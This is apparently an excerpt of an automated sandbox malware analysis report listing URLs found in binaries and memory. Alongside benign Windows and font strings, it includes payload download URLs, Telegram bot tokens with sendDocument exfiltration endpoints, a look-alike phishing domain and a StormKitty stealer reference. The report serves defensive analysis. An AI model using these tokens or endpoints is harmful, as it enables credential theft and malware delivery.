                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/Client.exe
                      Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/Installer.exe
                      Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/Server.exe
                      Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/aaa.exe
                      Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/build.exe
                      Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igenius.org/update.exe
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe
                      Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: explorer.exe, 00000002.00000000.1790509509.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176869488.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: 62AB.tmp.build.exe, 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif$
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8V
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8Z
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003110000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                      Source: explorer.exe, 00000002.00000002.3134385875.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783876934.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000002.3162050946.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                      Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.0000000003468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.000000000349A000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.000000000252A000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 4336.tmp.Server.exe.2.drString found in binary or memory: https://api.telegram.org/bot
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====
                      Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
                      Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795
                      Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=57954
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-420
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8
                      Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botTF
                      Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.drString found in binary or memory: https://api.telegram.org/file/bot
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgd
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.vimeworld.ru/user/name/
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.drString found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
                      Source: explorer.exe, 00000002.00000002.3162050946.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg
                      Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                      Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                      Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233130000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.co1
                      Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233130000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.xn--conbase-sfb.xyz/
                      Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.xn--conbase-sfb.xyz/c
                      Source: relog.exeString found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.php
                      Source: xj40xovMsm.exe, 00000019.00000002.2618262946.00000229BA940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.
                      Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.drString found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.phpSystemUpdate.exeTaskmgr.exe
                      Source: xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.xn--conbase-sfb.xyz/event.phpx
                      Source: prefs.js.1.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: prefs.js.1.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                      Source: xj40xovMsm.exeString found in binary or memory: https://cex.io/widget/light/100/btc-usd
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: xj40xovMsm.exeString found in binary or memory: https://coinkeep.info/d3n13d/formpage.html
                      Source: prefs.js.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: prefs.js.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: relog.exeString found in binary or memory: https://exchanger.ink/event.php
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://forums.dropbox.com
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/
                      Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: 4BC4.tmp.Client.exe.2.dr, 4336.tmp.Server.exe.2.drString found in binary or memory: https://github.com/LimerBoy/StormKitty
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&fq
